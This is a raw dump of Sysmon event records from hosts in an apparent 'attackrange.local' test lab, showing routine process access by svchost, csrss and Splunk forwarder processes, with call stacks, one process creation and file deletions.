10341000x8000000000000000807001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.248{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.059{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF98D2E884EC8C2BF075B63B674797BE,SHA256=DA02E0E55A088C7000134D3311E5EC04C7BE78D5941AC4D17E064644E658DC81,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:24.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4840AB55D15F2E1F2388494E55EC4B1,SHA256=AA9C05162C551345BD74A6A7D2DF91B8D38EE4D8CB419E1618D6F604ACC7478F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.763{0C1E0330-F405-60EB-6079-00000000D001}3881476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:25.638{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F405-60EB-6079-00000000D001}388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
